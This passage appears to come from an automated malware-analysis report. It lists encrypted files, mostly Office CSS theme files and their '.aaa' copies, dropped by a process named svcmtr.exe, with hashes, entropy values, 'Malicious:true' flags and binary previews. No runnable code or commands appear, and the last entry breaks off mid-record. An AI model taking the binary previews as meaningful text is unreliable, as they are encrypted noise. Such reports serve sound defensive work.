                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..e..b8.U.1...n........CH.0....._..."N.#....a.%z.o....v}.......i.............\.........$.....2.TR.N.:.)...d....I,.e9....q.Li(...}..5#4.{..&Q..P.!h.B.l(,...JN.#.DYF..."9....!..V>7.JEK.._...q.+(..|..........u....\JjgP...:..D.a.FT..w8zF<.7.>......e.|I+....gy..^...w..O(.G.[VD|.iC..Ak..V...pM.}9tb..K=.]Ds...k.......Y....C....8...R..L...B.8S......z... ..%.3t...G`p.....4y4...q..."8.NJR..y`k..P.._.`).\..e?...."CV@.-uy.R..!NF..;j`.._;...4p{?..3.I.U.....W$U..1.......P..^..!.~..]H..P..@.......y.m.R.....R.Q...E.DM?c.B..#.......Z..S.1......I` 4`.Q-..5.......*.H...?...\d.H....g.`[...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127806
                                                                                                                          Entropy (8bit):7.998573252148866
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:sIw0JXzoI8ahf3c9HLdkVm2cInW0hwNKK7Y/2/:sIPXkIN/eyVmTIW0hB2YM
                                                                                                                          MD5:4D68065259D0000653EF10AA70011132
                                                                                                                          SHA1:20430E25373794D50942C263DB4D803A6F916FA0
                                                                                                                          SHA-256:C22CAAF89A21700DCA5D9FD97362365B5644AA5180C9BED3C92040BDDC2CC96D
                                                                                                                          SHA-512:D4120AC0D1AA990463E493175371908806248918B00997A8F7AB08A8E5BC00EF34F19357634DD586E1F60E53ECD29BC5FC528A466D7EFE9433EBFCE369D4D69B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....p........v.$......-l...MSq.....l.Q.*.n..7._%@:.E|..$W.bt+.J.Qz..{.@Hf.d5...._....M...:?........-.u..G......[.......e.z.j...F..8.R....[..D.....i#&j.......C.).5.a..D.[.;;....-..a..l._...Oq.d.C)..d.r./..,.m|..7...g(..n V..l.p..Z6............a....W4.1\....3.;.....Z.}xS*.!...1=M.a.y......K +m....`2...8.=`}...c..$....l.|........k.@...yx...;*V.....H.]0#.vq.&.|........B.....0..T......$...:....H...5.".........Ou8N..j...g.......N.j...d.B.n..auA.<2.F.>g.[.y.4.:.{.}.U.~..M[U......V.5.........+~E.m.Ul..Ya...{OG.b...p)...;.....w.%....,..9f..5S7......9_.x6..K>...g.+.!.p..'..gS.5q.c,.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127806
                                                                                                                          Entropy (8bit):7.998573252148866
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:sIw0JXzoI8ahf3c9HLdkVm2cInW0hwNKK7Y/2/:sIPXkIN/eyVmTIW0hB2YM
                                                                                                                          MD5:4D68065259D0000653EF10AA70011132
                                                                                                                          SHA1:20430E25373794D50942C263DB4D803A6F916FA0
                                                                                                                          SHA-256:C22CAAF89A21700DCA5D9FD97362365B5644AA5180C9BED3C92040BDDC2CC96D
                                                                                                                          SHA-512:D4120AC0D1AA990463E493175371908806248918B00997A8F7AB08A8E5BC00EF34F19357634DD586E1F60E53ECD29BC5FC528A466D7EFE9433EBFCE369D4D69B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....p........v.$......-l...MSq.....l.Q.*.n..7._%@:.E|..$W.bt+.J.Qz..{.@Hf.d5...._....M...:?........-.u..G......[.......e.z.j...F..8.R....[..D.....i#&j.......C.).5.a..D.[.;;....-..a..l._...Oq.d.C)..d.r./..,.m|..7...g(..n V..l.p..Z6............a....W4.1\....3.;.....Z.}xS*.!...1=M.a.y......K +m....`2...8.=`}...c..$....l.|........k.@...yx...;*V.....H.]0#.vq.&.|........B.....0..T......$...:....H...5.".........Ou8N..j...g.......N.j...d.B.n..auA.<2.F.>g.[.y.4.:.{.}.U.~..M[U......V.5.........+~E.m.Ul..Ya...{OG.b...p)...;.....w.%....,..9f..5S7......9_.x6..K>...g.+.!.p..'..gS.5q.c,.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129838
                                                                                                                          Entropy (8bit):7.99835890104631
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:9go6B7Yxz5r+jjv9pen/f0tJIMooyCvsd5dZ/w0:9WYjrSza/fcJIaO/B
                                                                                                                          MD5:01A1C69BCF816E2A730E1996184F0B5E
                                                                                                                          SHA1:8CDE6161590E9EACEC599AF7C5DDD86F47BC7E91
                                                                                                                          SHA-256:2CC160EAC786AAEE739F8B097222FD4311E5BDB912E130870D0CE97102D5C19E
                                                                                                                          SHA-512:A8FBF02B9C1F7E7E44770833BE170487A7602CE377F36C7FB0D9E2DBCCD57536B514ECDF329F85BF20ED2A3299317E9325D0CCA1DDE7ED1C9629933787912F90
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........n==...a.....H......}..M=w9.~.9O..).#.Y.....~.y@...t..'..Lz........M..o.OH.$.F..?..........;..w.{..)k.x.=.d..m[..t..1]).....K.....[;..<..L...J.D'..V..;v....9.J...V.|..3....xv.I9)....is !....F|.*fU.}..'...]p...@...-lG..OY...r7.!..`..h.D..!.VR-."Cj.tI..CI...5E9.~.R.\..i.....I^....q..G...Q]^.../......}...:b...J.J.t#!9.R.8.F...W.J..5s...y[....^..Lz.,......^3.+{.v.m.....{`..@i..U...X^.B...../CKF'R.Mc.>O!.Pjb...Bs.r...~8.*...].......2".= [.x.eg.|P....eL..}.A.M.Ni.E6....j.G..S......k....G.s...T-.[).7@/...x}.P...$&..Tkk0..G...t...g.........(.}5^........B....^.<..$.......{

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129838
                                                                                                                          Entropy (8bit):7.99835890104631
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:9go6B7Yxz5r+jjv9pen/f0tJIMooyCvsd5dZ/w0:9WYjrSza/fcJIaO/B
                                                                                                                          MD5:01A1C69BCF816E2A730E1996184F0B5E
                                                                                                                          SHA1:8CDE6161590E9EACEC599AF7C5DDD86F47BC7E91
                                                                                                                          SHA-256:2CC160EAC786AAEE739F8B097222FD4311E5BDB912E130870D0CE97102D5C19E
                                                                                                                          SHA-512:A8FBF02B9C1F7E7E44770833BE170487A7602CE377F36C7FB0D9E2DBCCD57536B514ECDF329F85BF20ED2A3299317E9325D0CCA1DDE7ED1C9629933787912F90
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........n==...a.....H......}..M=w9.~.9O..).#.Y.....~.y@...t..'..Lz........M..o.OH.$.F..?..........;..w.{..)k.x.=.d..m[..t..1]).....K.....[;..<..L...J.D'..V..;v....9.J...V.|..3....xv.I9)....is !....F|.*fU.}..'...]p...@...-lG..OY...r7.!..`..h.D..!.VR-."Cj.tI..CI...5E9.~.R.\..i.....I^....q..G...Q]^.../......}...:b...J.J.t#!9.R.8.F...W.J..5s...y[....^..Lz.,......^3.+{.v.m.....{`..@i..U...X^.B...../CKF'R.Mc.>O!.Pjb...Bs.r...~8.*...].......2".= [.x.eg.|P....eL..}.A.M.Ni.E6....j.G..S......k....G.s...T-.[).7@/...x}.P...$&..Tkk0..G...t...g.........(.}5^........B....^.<..$.......{

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121870
                                                                                                                          Entropy (8bit):7.998281054733269
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Dsk1BqKG2kL+Vq+UYMFDhVIARuHDe7pV8W/6qs:jqL+VK/dVjy2yqs
                                                                                                                          MD5:6AC0EA6B5EFC5F4BA14E76A1AD633970
                                                                                                                          SHA1:9509E5D62A9FF48B6565119970EB259A89754BDA
                                                                                                                          SHA-256:450AB1F292D1BDA7E61FFC4A2FE375AE02AD305E98BFBC998A63CF3A3622EE73
                                                                                                                          SHA-512:7FFFCABF1728D70C1F3E0236F6EC9B84481E08C73354F249422CECBDB277314275AD9AADD5D6E771C907D43CCAEEFF67B63803330AF8159800F143E318FD689F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........vF......l.....1..6.$...n../% .....B. u.J.KN:@...3...u].]...1t....=..2~1s......'.0i..Ugm..Y...,Kc.)P.g....$.$p.8...3....7...9.@i...i7<..V.... z.+..../.......o0..U..n...M{j...O1(.u..L..k....H..Kf..:f&.F....].c?..7d.H....M$.#T"......f...+..'.Q....3!...j..O..P.,.k..X.8Kp..U...D.}..5Ji.*"...S.rm,.m.{7...@f.D.J../.@..A"...+.^J..^.bZ....T....fE..|CU...ruS.....S...H...O#..U,e..>}3....Du......E.4..?...{3...ix.,....../pB.........4../.7B..)..oF.Q....."e...p.......M..X.../(.....x....^)Ok:....Z.z7..a.P"...C....=3.Z.L&W~..$)#.....a.Go..B3...1..!:...n..}......3..KG..Q....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):121870
                                                                                                                          Entropy (8bit):7.998281054733269
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Dsk1BqKG2kL+Vq+UYMFDhVIARuHDe7pV8W/6qs:jqL+VK/dVjy2yqs
                                                                                                                          MD5:6AC0EA6B5EFC5F4BA14E76A1AD633970
                                                                                                                          SHA1:9509E5D62A9FF48B6565119970EB259A89754BDA
                                                                                                                          SHA-256:450AB1F292D1BDA7E61FFC4A2FE375AE02AD305E98BFBC998A63CF3A3622EE73
                                                                                                                          SHA-512:7FFFCABF1728D70C1F3E0236F6EC9B84481E08C73354F249422CECBDB277314275AD9AADD5D6E771C907D43CCAEEFF67B63803330AF8159800F143E318FD689F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........vF......l.....1..6.$...n../% .....B. u.J.KN:@...3...u].]...1t....=..2~1s......'.0i..Ugm..Y...,Kc.)P.g....$.$p.8...3....7...9.@i...i7<..V.... z.+..../.......o0..U..n...M{j...O1(.u..L..k....H..Kf..:f&.F....].c?..7d.H....M$.#T"......f...+..'.Q....3!...j..O..P.,.k..X.8Kp..U...D.}..5Ji.*"...S.rm,.m.{7...@f.D.J../.@..A"...+.^J..^.bZ....T....fE..|CU...ruS.....S...H...O#..U,e..>}3....Du......E.4..?...{3...ix.,....../pB.........4../.7B..)..oF.Q....."e...p.......M..X.../(.....x....^)Ok:....Z.z7..a.P"...C....=3.Z.L&W~..$)#.....a.Go..B3...1..!:...n..}......3..KG..Q....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127422
                                                                                                                          Entropy (8bit):7.998537358548792
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZpJ/2CUg3CEH5++rwaut6s8j0C68O4Rb+D21JgHdU7X8+:Zn/2CTP51U8j0AB+DEJ9X8+
                                                                                                                          MD5:083B6B37A4CE5CFC68A0EE55FA9F1693
                                                                                                                          SHA1:728D1D981ED2AA3DE1385AA9642BC9AD6764E99A
                                                                                                                          SHA-256:102DA5D4B9399DB6002527B531A4644F872D2820C0B4168ADD6516137C81B547
                                                                                                                          SHA-512:D38C2C8DE8273A1DBC74AC3CD01367542BCA0452AFF1AB96DFDC5ED17F09C017336F88EA51D29E1F3374DBBA31033FC11F2A6E959AE059E0E72418224A08531F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....%.)...Q.t*,.......r...FgD.f.<..c/..@f.B...9.1s."F.,..5v.../+..[u.|...p..........f]...d[7c....@k.Ft"...a.HF...\.....*..D..n<.?`..k"+'.......G..._...i+...!....X./;.~...P.!.y.J~. /c..#..;.a.......gz..i..0$b........I.k..1..v...l.&f..y.V......'../.U...\u.....m.|`.b.(.(e..>|E..g)....U...l:%...[....E....6..3W.!.@...._.._Q..~x.D..c...v".|..e.....i.h.5n*XL.(.....Q...f.+.jI...U...Pr0T.]......e9.....{G..1.;j...9...^$.a......*{N'...f..P....."6.|.p^.]i.....D..>H.....0..B.&.........s. ...F...H..WWJ...JR..w.zc.|h..%...:....%.>.........r.Li..<.H!.'&.....U>..."..j.R?.z..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127422
                                                                                                                          Entropy (8bit):7.998537358548792
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZpJ/2CUg3CEH5++rwaut6s8j0C68O4Rb+D21JgHdU7X8+:Zn/2CTP51U8j0AB+DEJ9X8+
                                                                                                                          MD5:083B6B37A4CE5CFC68A0EE55FA9F1693
                                                                                                                          SHA1:728D1D981ED2AA3DE1385AA9642BC9AD6764E99A
                                                                                                                          SHA-256:102DA5D4B9399DB6002527B531A4644F872D2820C0B4168ADD6516137C81B547
                                                                                                                          SHA-512:D38C2C8DE8273A1DBC74AC3CD01367542BCA0452AFF1AB96DFDC5ED17F09C017336F88EA51D29E1F3374DBBA31033FC11F2A6E959AE059E0E72418224A08531F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....%.)...Q.t*,.......r...FgD.f.<..c/..@f.B...9.1s."F.,..5v.../+..[u.|...p..........f]...d[7c....@k.Ft"...a.HF...\.....*..D..n<.?`..k"+'.......G..._...i+...!....X./;.~...P.!.y.J~. /c..#..;.a.......gz..i..0$b........I.k..1..v...l.&f..y.V......'../.U...\u.....m.|`.b.(.(e..>|E..g)....U...l:%...[....E....6..3W.!.@...._.._Q..~x.D..c...v".|..e.....i.h.5n*XL.(.....Q...f.+.jI...U...Pr0T.]......e9.....{G..1.;j...9...^$.a......*{N'...f..P....."6.|.p^.]i.....D..>H.....0..B.&.........s. ...F...H..WWJ...JR..w.zc.|h..%...:....%.>.........r.Li..<.H!.'&.....U>..."..j.R?.z..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123150
                                                                                                                          Entropy (8bit):7.998475908610258
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZVXZX4HOnWBDUIi//gTx4x6xfOHY8xRVyeXO1FZAEK:ZVJSSfOx1xfaxWekrAB
                                                                                                                          MD5:A26F8E0493CCC85947A79556D20E0E54
                                                                                                                          SHA1:16DC891886C7220DBE9F6195802F6AB7D60613DB
                                                                                                                          SHA-256:DA122B3568C050DACBF04E43C01218CB0B986F8964B3A59D0BC477EAD68679FC
                                                                                                                          SHA-512:1D7107732C6F93759137FB5277576AE24A24427C2037079B967A281399E0EF7DE9232E48787C38D925C6307E0769C6E0FD56C8A8CA4078ECECCD163F25F8831D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....S..`.y(..C.K.Rh....b....n.;TN.......$..N^._....Wp.....sd^......#..v.].8.Ye..6@`s.pX.+.E ...}........`^..<m}...p/$..D..gc.h..~.Fv.<=s....eI.V........o@pd...k3....%9oj&...s.U8%m...<...<...A.&.N....l....2.F.;R...&.*/8..f....7....ez...auAZ.......X.G....Q2/.O....Z...q_e.h)Y.....)G..Q..B....S......,..G......}.J?./u...<...0...BB.3.x.xr....r.%..R.e...f....f.......g# 1OD..).Y.Kg.......:s.H^e...G.....XB.6#. ....=...V..o......1&....1mm^bL3.C..n.6.6.e.>.x..&.k...F7.....kh.Su*.'.z...=..G.p.d..gS.|...K.89.;.L...T.y..{....C..0R[.`..`.n.u.e.S.C}...u.iW./........c._......]~.M~..X

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123150
                                                                                                                          Entropy (8bit):7.998475908610258
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:ZVXZX4HOnWBDUIi//gTx4x6xfOHY8xRVyeXO1FZAEK:ZVJSSfOx1xfaxWekrAB
                                                                                                                          MD5:A26F8E0493CCC85947A79556D20E0E54
                                                                                                                          SHA1:16DC891886C7220DBE9F6195802F6AB7D60613DB
                                                                                                                          SHA-256:DA122B3568C050DACBF04E43C01218CB0B986F8964B3A59D0BC477EAD68679FC
                                                                                                                          SHA-512:1D7107732C6F93759137FB5277576AE24A24427C2037079B967A281399E0EF7DE9232E48787C38D925C6307E0769C6E0FD56C8A8CA4078ECECCD163F25F8831D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....S..`.y(..C.K.Rh....b....n.;TN.......$..N^._....Wp.....sd^......#..v.].8.Ye..6@`s.pX.+.E ...}........`^..<m}...p/$..D..gc.h..~.Fv.<=s....eI.V........o@pd...k3....%9oj&...s.U8%m...<...<...A.&.N....l....2.F.;R...&.*/8..f....7....ez...auAZ.......X.G....Q2/.O....Z...q_e.h)Y.....)G..Q..B....S......,..G......}.J?./u...<...0...BB.3.x.xr....r.%..R.e...f....f.......g# 1OD..).Y.Kg.......:s.H^e...G.....XB.6#. ....=...V..o......1&....1mm^bL3.C..n.6.6.e.>.x..&.k...F7.....kh.Su*.'.z...=..G.p.d..gS.|...K.89.;.L...T.y..{....C..0R[.`..`.n.u.e.S.C}...u.iW./........c._......]~.M~..X

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123902
                                                                                                                          Entropy (8bit):7.998524202944642
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:faJBZvYgQQonRIJM+djXB8ZvvVpZ8RJoKrCPQ+6strCaBKVU5S:yJBZKnuS8CvvCJoud+dtrr4
                                                                                                                          MD5:E59498EAF49873FE36AFC6FCD72B60BB
                                                                                                                          SHA1:0FA0AA95B824755613E1C9DE5B49595F065C4985
                                                                                                                          SHA-256:6AF46AE03C86718530EC42E1F3B8596375EB7D25E4FBAF2963EC01ECB55DCBBC
                                                                                                                          SHA-512:CFF68493BC339C0626C57B3BDA40E592B82A393114A85E4C8F2ABCF814B234FA0B1169041DB3F735B832B9F226A10CB1ECC01D97CFF678D8C77428788BFA82FB
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..y..y....i..l|3.T.....[ne.(Rn.e..S....._Cd,<.;.c&.L....w....B....T..i..c3[.j..;...#..#;............'s.B.....E..C$.w.N....$s('.=....7...}oT.d.j.....42...HE......nS....-.:..._..g.}.A9..w..../n...z&/O..{=...B...0...".k....s..]....$............W...(V.T.....w[...i..?#o.d.:.Y;.j.b..vjBKFck...4E..........Q.q.....(7v....1...=.....'.G.... ..r...G$.xp.A^8.......K...........<.5..'..C....F....q.G.5...y".....t.t.b.~w......o..G2..."..\..@..]..,g.@.K.....P.*...W|@..SK.3..C.1..|.&.q....!.U...9...<...F.;..1..=...|%'.Ae.....z..H..D.}.E..z...9....`....`..e...I.(.0...0T.....EAR.u."...5.-9_.#P

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123902
                                                                                                                          Entropy (8bit):7.998524202944642
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:faJBZvYgQQonRIJM+djXB8ZvvVpZ8RJoKrCPQ+6strCaBKVU5S:yJBZKnuS8CvvCJoud+dtrr4
                                                                                                                          MD5:E59498EAF49873FE36AFC6FCD72B60BB
                                                                                                                          SHA1:0FA0AA95B824755613E1C9DE5B49595F065C4985
                                                                                                                          SHA-256:6AF46AE03C86718530EC42E1F3B8596375EB7D25E4FBAF2963EC01ECB55DCBBC
                                                                                                                          SHA-512:CFF68493BC339C0626C57B3BDA40E592B82A393114A85E4C8F2ABCF814B234FA0B1169041DB3F735B832B9F226A10CB1ECC01D97CFF678D8C77428788BFA82FB
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..y..y....i..l|3.T.....[ne.(Rn.e..S....._Cd,<.;.c&.L....w....B....T..i..c3[.j..;...#..#;............'s.B.....E..C$.w.N....$s('.=....7...}oT.d.j.....42...HE......nS....-.:..._..g.}.A9..w..../n...z&/O..{=...B...0...".k....s..]....$............W...(V.T.....w[...i..?#o.d.:.Y;.j.b..vjBKFck...4E..........Q.q.....(7v....1...=.....'.G.... ..r...G$.xp.A^8.......K...........<.5..'..C....F....q.G.5...y".....t.t.b.~w......o..G2..."..\..@..]..,g.@.K.....P.*...W|@..SK.3..C.1..|.&.q....!.U...9...<...F.;..1..=...|%'.Ae.....z..H..D.}.E..z...9....`....`..e...I.(.0...0T.....EAR.u."...5.-9_.#P

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125006
                                                                                                                          Entropy (8bit):7.998415768971659
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:tmYMmQbQI5wmy8KFlu0e89HKXWSz5VPya+tOrg8f3oXloX:tmYnQB7y8KYWSnPp+tOdeW
                                                                                                                          MD5:D7641AD1ECC678646229941F810E660A
                                                                                                                          SHA1:EAAE2D6143CEA402DB325459DCECB077F8EBCDC4
